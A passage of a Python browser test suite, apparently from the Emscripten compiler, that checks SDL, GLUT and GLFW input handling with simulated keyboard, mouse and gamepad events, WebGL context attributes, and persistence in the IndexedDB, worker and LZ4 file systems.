self.btest('sdl_canvas_alpha.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_alpha.png', reference_slack=12)
self.btest('sdl_canvas_alpha.c', args=['--pre-js', 'flag_0.js', '-lSDL', '-lGL'], reference='sdl_canvas_alpha_flag_0.png', reference_slack=12)
def test_sdl_key(self):
for delay in [0, 1]:
for defines in [
[],
['-DTEST_EMSCRIPTEN_SDL_SETEVENTHANDLER']
]:
for async_ in [
[],
['-DTEST_SLEEP', '-s', 'ASSERTIONS', '-s', 'SAFE_HEAP', '-s', 'ASYNCIFY']
]:
print(delay, defines, async_)
create_file('pre.js', '''
function keydown(c) {
%s
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
%s
}
function keyup(c) {
%s
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
%s
}
''' % ('setTimeout(function() {' if delay else '', '}, 1);' if delay else '', 'setTimeout(function() {' if delay else '', '}, 1);' if delay else ''))
self.compile_btest([test_file('sdl_key.c'), '-o', 'page.html'] + defines + async_ + ['--pre-js', 'pre.js', '-s', 'EXPORTED_FUNCTIONS=_main', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?223092870')
def test_sdl_key_proxy(self):
create_file('pre.js', '''
var Module = {};
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
''')
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
keydown(1250);keydown(38);keyup(38);keyup(1250); // alt, up
keydown(1248);keydown(1249);keydown(40);keyup(40);keyup(1249);keyup(1248); // ctrl, shift, down
keydown(37);keyup(37); // left
keydown(39);keyup(39); // right
keydown(65);keyup(65); // a
keydown(66);keyup(66); // b
keydown(100);keyup(100); // trigger the end
</script>
</body>''')
create_file('test.html', html)
self.btest('sdl_key_proxy.c', '223092870', args=['--proxy-to-worker', '--pre-js', 'pre.js', '-s', 'EXPORTED_FUNCTIONS=_main,_one', '-lSDL', '-lGL'], manual_reference=True, post_build=post)
def test_canvas_focus(self):
self.btest('canvas_focus.c', '1')
def test_keydown_preventdefault_proxy(self):
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function keypress(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function sendKey(c) {
// Simulate the sending of the keypress event when the
// prior keydown event is not prevent defaulted.
if (keydown(c) === false) {
console.log('keydown prevent defaulted, NOT sending keypress!!!');
} else {
keypress(c);
}
keyup(c);
}
// Send 'a'. Simulate the sending of the keypress event when the
// prior keydown event is not prevent defaulted.
sendKey(65);
// Send backspace. Keypress should not be sent over as default handling of
// the Keydown event should be prevented.
sendKey(8);
keydown(100);keyup(100); // trigger the end
</script>
</body>''')
create_file('test.html', html)
self.btest('keydown_preventdefault_proxy.cpp', '300', args=['--proxy-to-worker', '-s', 'EXPORTED_FUNCTIONS=_main'], manual_reference=True, post_build=post)
def test_sdl_text(self):
create_file('pre.js', '''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function simulateKeyEvent(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.body.dispatchEvent(event);
}
''')
self.compile_btest([test_file('sdl_text.c'), '-o', 'page.html', '--pre-js', 'pre.js', '-s', 'EXPORTED_FUNCTIONS=_main,_one', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_mouse(self):
create_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
self.compile_btest([test_file('sdl_mouse.c'), '-O2', '--minify=0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_mouse_offsets(self):
create_file('pre.js', '''
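      // Same helper as in test_sdl_mouse, but the events use page coordinates
      // directly (no canvas offsets added); the CSS-positioned canvas in page.html
      // below presumably exercises SDL's own offset handling (-DTEST_SDL_MOUSE_OFFSETS).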
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, x, y, x, y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
create_file('page.html', '''
<html>
<head>
<style type="text/css">
html, body { margin: 0; padding: 0; }
#container {
position: absolute;
left: 5px; right: 0;
top: 5px; bottom: 0;
}
#canvas {
position: absolute;
left: 0; width: 600px;
top: 0; height: 450px;
}
textarea {
margin-top: 500px;
margin-left: 5px;
width: 600px;
}
</style>
</head>
<body>
<div id="container">
<canvas id="canvas"></canvas>
</div>
<textarea id="output" rows="8"></textarea>
<script type="text/javascript">
var Module = {
canvas: document.getElementById('canvas'),
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
if (arguments.length > 1) text = Array.prototype.slice.call(arguments).join(' ');
element.value += text + "\\n";
element.scrollTop = element.scrollHeight; // focus on bottom
};
})()
};
</script>
<script type="text/javascript" src="sdl_mouse.js"></script>
</body>
</html>
''')
self.compile_btest([test_file('sdl_mouse.c'), '-DTEST_SDL_MOUSE_OFFSETS', '-O2', '--minify=0', '-o', 'sdl_mouse.js', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
def test_glut_touchevents(self):
self.btest('glut_touchevents.c', '1', args=['-lglut'])
def test_glut_wheelevents(self):
self.btest('glut_wheelevents.c', '1', args=['-lglut'])
@requires_graphics_hardware
def test_glut_glutget_no_antialias(self):
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL'])
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED'])
# This test supersedes the one above, but it's skipped in the CI because anti-aliasing is not well supported by the Mesa software renderer.
@requires_graphics_hardware
def test_glut_glutget(self):
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL'])
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED'])
def test_sdl_joystick_1(self):
# Generates events corresponding to the Working Draft of the HTML5 Gamepad API.
# http://www.w3.org/TR/2012/WD-gamepad-20120529/#gamepad-interface
create_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
gamepads.push({
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
});
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = 0;
};
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button] = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button] = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
self.compile_btest([test_file('sdl_joystick.c'), '-O2', '--minify=0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?2')
def test_sdl_joystick_2(self):
# Generates events corresponding to the Editor's Draft of the HTML5 Gamepad API.
# https://dvcs.w3.org/hg/gamepad/raw-file/default/gamepad.html#idl-def-Gamepad
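    # Unlike test_sdl_joystick_1, buttons here are objects with pressed/value
    # fields, matching the newer draft of the Gamepad API.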
create_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
gamepads.push({
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
});
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
// Buttons are objects
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = { pressed: false, value: 0 };
};
// FF mutates the original objects.
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button].pressed = true;
gamepads[index].buttons[button].value = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button].pressed = false;
gamepads[index].buttons[button].value = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
self.compile_btest([test_file('sdl_joystick.c'), '-O2', '--minify=0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?2')
@requires_graphics_hardware
def test_glfw_joystick(self):
# Generates events corresponding to the Editor's Draft of the HTML5 Gamepad API.
# https://dvcs.w3.org/hg/gamepad/raw-file/default/gamepad.html#idl-def-Gamepad
create_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
var gamepad = {
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
};
gamepads.push(gamepad)
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
// Buttons are objects
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = { pressed: false, value: 0 };
// Dispatch event (required for glfw joystick; note not used in SDL test)
var event = new Event('gamepadconnected');
event.gamepad = gamepad;
window.dispatchEvent(event);
};
// FF mutates the original objects.
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button].pressed = true;
gamepads[index].buttons[button].value = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button].pressed = false;
gamepads[index].buttons[button].value = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
self.compile_btest([test_file('test_glfw_joystick.c'), '-O2', '--minify=0', '-o', 'page.html', '--pre-js', 'pre.js', '-lGL', '-lglfw3', '-s', 'USE_GLFW=3'])
self.run_browser('page.html', '', '/report_result?2')
@requires_graphics_hardware
def test_webgl_context_attributes(self):
    # JavaScript code to check the context attributes we want to test in the WebGL
    # implementation (request the attribute, create a context, then check the
    # attribute's actual value in the resulting context attributes).
    # The tests still pass when an attribute is not supported.
create_file('check_webgl_attributes_support.js', '''
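      // mergeInto() adds these functions to the Emscripten JS library, so the C
      // test code can call them directly when built with --js-library below.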
mergeInto(LibraryManager.library, {
webglAntialiasSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {antialias: true});
attributes = context.getContextAttributes();
return attributes.antialias;
},
webglDepthSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {depth: true});
attributes = context.getContextAttributes();
return attributes.depth;
},
webglStencilSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {stencil: true});
attributes = context.getContextAttributes();
return attributes.stencil;
},
webglAlphaSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {alpha: true});
attributes = context.getContextAttributes();
return attributes.alpha;
}
});
''')
# Copy common code file to temporary directory
filepath = test_file('test_webgl_context_attributes_common.c')
temp_filepath = os.path.join(self.get_dir(), os.path.basename(filepath))
shutil.copyfile(filepath, temp_filepath)
# perform tests with attributes activated
self.btest('test_webgl_context_attributes_glut.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lglut', '-lGLEW'])
self.btest('test_webgl_context_attributes_sdl.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lSDL', '-lGLEW'])
self.btest('test_webgl_context_attributes_sdl2.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-s', 'USE_SDL=2', '-lGLEW'])
self.btest('test_webgl_context_attributes_glfw.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lglfw', '-lGLEW'])
    # perform tests with attributes deactivated
self.btest('test_webgl_context_attributes_glut.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lglut', '-lGLEW'])
self.btest('test_webgl_context_attributes_sdl.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lSDL', '-lGLEW'])
self.btest('test_webgl_context_attributes_glfw.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lglfw', '-lGLEW'])
@requires_graphics_hardware
def test_webgl_no_double_error(self):
self.btest('webgl_error.cpp', '0')
@requires_graphics_hardware
def test_webgl_parallel_shader_compile(self):
self.btest('webgl_parallel_shader_compile.cpp', '1')
@requires_graphics_hardware
def test_webgl_explicit_uniform_location(self):
self.btest('webgl_explicit_uniform_location.c', '1', args=['-s', 'GL_EXPLICIT_UNIFORM_LOCATION=1', '-s', 'MIN_WEBGL_VERSION=2'])
@requires_graphics_hardware
def test_webgl_sampler_layout_binding(self):
self.btest('webgl_sampler_layout_binding.c', '1', args=['-s', 'GL_EXPLICIT_UNIFORM_BINDING=1'])
@unittest.skip('needs to be fixed, see https://github.com/emscripten-core/emscripten/pull/13887#issuecomment-825804449')
@requires_graphics_hardware
def test_webgl2_ubo_layout_binding(self):
self.btest('webgl2_ubo_layout_binding.c', '1', args=['-s', 'GL_EXPLICIT_UNIFORM_BINDING=1', '-s', 'MIN_WEBGL_VERSION=2'])
# Test that -s GL_PREINITIALIZED_CONTEXT=1 works and allows user to set Module['preinitializedWebGLContext'] to a preinitialized WebGL context.
@requires_graphics_hardware
def test_preinitialized_webgl_context(self):
self.btest('preinitialized_webgl_context.cpp', '5', args=['-s', 'GL_PREINITIALIZED_CONTEXT', '--shell-file', test_file('preinitialized_webgl_context.html')])
@requires_threads
def test_emscripten_get_now(self):
for args in [[], ['-s', 'USE_PTHREADS'], ['-s', 'ENVIRONMENT=web', '-O2', '--closure=1']]:
self.btest('emscripten_get_now.cpp', '1', args=args)
def test_write_file_in_environment_web(self):
self.btest_exit('write_file.c', args=['-s', 'ENVIRONMENT=web', '-Os', '--closure=1'])
def test_fflush(self):
self.btest('test_fflush.cpp', '0', args=['-s', 'EXIT_RUNTIME', '--shell-file', test_file('test_fflush.html')], reporting=Reporting.NONE)
def test_file_db(self):
secret = str(time.time())
create_file('moar.txt', secret)
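    # The first run (-DFIRST) presumably persists the secret into IndexedDB; the
    # later runs read it back, even when a different preloaded file is present.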
self.btest('file_db.cpp', '1', args=['--preload-file', 'moar.txt', '-DFIRST'])
shutil.copyfile('test.html', 'first.html')
self.btest('file_db.cpp', secret, args=['-s', 'FORCE_FILESYSTEM'])
shutil.copyfile('test.html', 'second.html')
create_file('moar.txt', 'aliantha')
self.btest('file_db.cpp', secret, args=['--preload-file', 'moar.txt']) # even with a file there, we load over it
shutil.move('test.html', 'third.html')
def test_fs_idbfs_sync(self):
for extra in [[], ['-DEXTRA_WORK']]:
secret = str(time.time())
self.btest(test_file('fs', 'test_idbfs_sync.c'), '1', args=['-lidbfs.js', '-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', 'EXPORTED_FUNCTIONS=_main,_test,_success', '-lidbfs.js'])
self.btest(test_file('fs', 'test_idbfs_sync.c'), '1', args=['-lidbfs.js', '-DSECRET=\"' + secret + '\"', '-s', 'EXPORTED_FUNCTIONS=_main,_test,_success', '-lidbfs.js'] + extra)
def test_fs_idbfs_sync_force_exit(self):
secret = str(time.time())
self.btest(test_file('fs', 'test_idbfs_sync.c'), '1', args=['-lidbfs.js', '-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', 'EXPORTED_FUNCTIONS=_main,_test,_success', '-s', 'EXIT_RUNTIME', '-DFORCE_EXIT', '-lidbfs.js'])
self.btest(test_file('fs', 'test_idbfs_sync.c'), '1', args=['-lidbfs.js', '-DSECRET=\"' + secret + '\"', '-s', 'EXPORTED_FUNCTIONS=_main,_test,_success', '-s', 'EXIT_RUNTIME', '-DFORCE_EXIT', '-lidbfs.js'])
def test_fs_idbfs_fsync(self):
# sync from persisted state into memory before main()
create_file('pre.js', '''
Module.preRun = function() {
addRunDependency('syncfs');
FS.mkdir('/working1');
FS.mount(IDBFS, {}, '/working1');
FS.syncfs(true, function (err) {
if (err) throw err;
removeRunDependency('syncfs');
});
};
''')
args = ['--pre-js', 'pre.js', '-lidbfs.js', '-s', 'EXIT_RUNTIME', '-s', 'ASYNCIFY']
secret = str(time.time())
self.btest(test_file('fs', 'test_idbfs_fsync.c'), '1', args=args + ['-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', 'EXPORTED_FUNCTIONS=_main,_success', '-lidbfs.js'])
self.btest(test_file('fs', 'test_idbfs_fsync.c'), '1', args=args + ['-DSECRET=\"' + secret + '\"', '-s', 'EXPORTED_FUNCTIONS=_main,_success', '-lidbfs.js'])
def test_fs_memfs_fsync(self):
args = ['-s', 'ASYNCIFY', '-s', 'EXIT_RUNTIME']
secret = str(time.time())
self.btest(test_file('fs', 'test_memfs_fsync.c'), '1', args=args + ['-DSECRET=\"' + secret + '\"'])
def test_fs_workerfs_read(self):
secret = 'a' * 10
secret2 = 'b' * 10
create_file('pre.js', '''
var Module = {};
Module.preRun = function() {
var blob = new Blob(['%s']);
var file = new File(['%s'], 'file.txt');
FS.mkdir('/work');
FS.mount(WORKERFS, {
blobs: [{ name: 'blob.txt', data: blob }],
files: [file],
}, '/work');
};
''' % (secret, secret2))
self.btest(test_file('fs', 'test_workerfs_read.c'), '1', args=['-lworkerfs.js', '--pre-js', 'pre.js', '-DSECRET=\"' + secret + '\"', '-DSECRET2=\"' + secret2 + '\"', '--proxy-to-worker', '-lworkerfs.js'])
def test_fs_workerfs_package(self):
create_file('file1.txt', 'first')
ensure_dir('sub')
open(os.path.join('sub', 'file2.txt'), 'w').write('second')
self.run_process([FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', os.path.join('sub', 'file2.txt'), '--separate-metadata', '--js-output=files.js'])
self.btest(os.path.join('fs', 'test_workerfs_package.cpp'), '1', args=['-lworkerfs.js', '--proxy-to-worker', '-lworkerfs.js'])
def test_fs_lz4fs_package(self):
# generate data
ensure_dir('subdir')
create_file('file1.txt', '0123456789' * (1024 * 128))
open(os.path.join('subdir', 'file2.txt'), 'w').write('1234567890' * (1024 * 128))
random_data = bytearray(random.randint(0, 255) for x in range(1024 * 128 * 10 + 1))
random_data[17] = ord('X')
open('file3.txt', 'wb').write(random_data)
# compress in emcc, -s LZ4=1 tells it to tell the file packager
print('emcc-normal')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['-s', 'LZ4=1', '--preload-file', 'file1.txt', '--preload-file', 'subdir/file2.txt', '--preload-file', 'file3.txt'])
assert os.path.getsize('file1.txt') + os.path.getsize(os.path.join('subdir', 'file2.txt')) + os.path.getsize('file3.txt') == 3 * 1024 * 128 * 10 + 1
assert os.path.getsize('test.data') < (3 * 1024 * 128 * 10) / 2 # over half is gone
print(' emcc-opts')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['-s', 'LZ4=1', '--preload-file', 'file1.txt', '--preload-file', 'subdir/file2.txt', '--preload-file', 'file3.txt', '-O2'])
# compress in the file packager, on the server. the client receives compressed data and can just use it. this is typical usage
print('normal')
out = subprocess.check_output([FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', 'subdir/file2.txt', 'file3.txt', '--lz4'])
open('files.js', 'wb').write(out)
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM'])
print(' opts')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM', '-O2'])
print(' modularize')
self.compile_btest([test_file('fs', 'test_lz4fs.cpp'), '--pre-js', 'files.js', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM', '-s', 'MODULARIZE=1'])
create_file('a.html', '''
<script src="a.out.js"></script>
<script>
Module()
</script>
''')
self.run_browser('a.html', '.', '/report_result?2')
# load the data into LZ4FS manually at runtime. This means we compress on the client. This is generally not recommended
print('manual')
subprocess.check_output([FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', 'subdir/file2.txt', 'file3.txt', '--separate-metadata', '--js-output=files.js'])
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM'])
print(' opts')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM', '-O2'])
print(' opts+closure')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM', '-O2', '--closure=1', '-g1', '-s', 'CLOSURE_WARNINGS=quiet'])
    # non-lz4 for comparison (disabled):
    # try:
    #   os.mkdir('files')
    # except OSError:
    #   pass
    # shutil.copyfile('file1.txt', os.path.join('files', 'file1.txt'))
    # shutil.copyfile('file2.txt', os.path.join('files', 'file2.txt'))
    # shutil.copyfile('file3.txt', os.path.join('files', 'file3.txt'))
    # out = subprocess.check_output([FILE_PACKAGER, 'files.data', '--preload', 'files/file1.txt', 'files/file2.txt', 'files/file3.txt'])
    # open('files.js', 'wb').write(out)
    # self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js'])
def test_separate_metadata_later(self):
# see issue #6654 - we need to handle separate-metadata both when we run before
# the main program, and when we are run later
create_file('data.dat', ' ')
self.run_process([FILE_PACKAGER, 'more.data', '--preload', 'data.dat', '--separate-metadata', '--js-output=more.js'])
self.btest(os.path.join('browser', 'separate_metadata_later.cpp'), '1', args=['-s', 'FORCE_FILESYSTEM'])
def test_idbstore(self):
secret = str(time.time())
for stage in [0, 1, 2, 3, 0, 1, 2, 0, 0, 1, 4, 2, 5]:
self.clear()
self.btest(test_file('idbstore.c'), str(stage), args=['-lidbstore.js', '-DSTAGE=' + str(stage), '-DSECRET=\"' + secret + '\"'])
def test_idbstore_sync(self):
secret = str(time.time())
self.clear()
self.btest(test_file('idbstore_sync.c'), '6', args=['-lidbstore.js', '-DSECRET=\"' + secret + '\"', '--memory-init-file', '1', '-O3', '-g2', '-s', 'ASYNCIFY'])
def test_idbstore_sync_worker(self):
secret = str(time.time())
self.clear()
self.btest(test_file('idbstore_sync_worker.c'), '6', args=['-lidbstore.js', '-DSECRET=\"' + secret + '\"', '--memory-init-file', '1', '-O3', '-g2', '--proxy-to-worker', '-s', 'INITIAL_MEMORY=80MB', '-s', 'ASYNCIFY'])
def test_force_exit(self):
self.btest('force_exit.c', expected='17', args=['-s', 'EXIT_RUNTIME'])
def test_sdl_pumpevents(self):
# key events should be detected using SDL_PumpEvents
create_file('pre.js', '''
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
self.btest_exit('sdl_pumpevents.c', assert_returncode=7, args=['--pre-js', 'pre.js', '-lSDL', '-lGL'])
def test_sdl_canvas_size(self):
self.btest('sdl_canvas_size.c', expected='1',
args=['-O2', '--minify=0', '--shell-file',
test_file('sdl_canvas_size.html'), '-lSDL', '-lGL'])
@requires_graphics_hardware
def test_sdl_gl_read(self):
# SDL, OpenGL, readPixels
self.compile_btest([test_file('sdl_gl_read.c'), '-o', 'something.html', '-lSDL', '-lGL'])
self.run_browser('something.html', '.', '/report_result?1')
@requires_graphics_hardware
def test_sdl_gl_mapbuffers(self):
self.btest('sdl_gl_mapbuffers.c', expected='1', args=['-s', 'FULL_ES3=1', '-lSDL', '-lGL'],
message='You should see a blue triangle.')
@requires_graphics_hardware
def test_sdl_ogl(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '--minify=0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_regal(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '--minify=0', '--preload-file', 'screenshot.png', '-s', 'USE_REGAL', '-DUSE_REGAL', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_defaultmatrixmode(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl_defaultMatrixMode.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['--minify=0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_p(self):
# Immediate mode with pointers
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl_p.c', reference='screenshot-gray.png', reference_slack=1,
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_proc_alias(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl_proc_alias.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '-g2', '-s', 'INLINING_LIMIT', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'])
@requires_graphics_hardware
def test_sdl_fog_simple(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_simple.c', reference='screenshot-fog-simple.png',
args=['-O2', '--minify=0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_negative(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_negative.c', reference='screenshot-fog-negative.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_density(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_density.c', reference='screenshot-fog-density.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_exp2(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
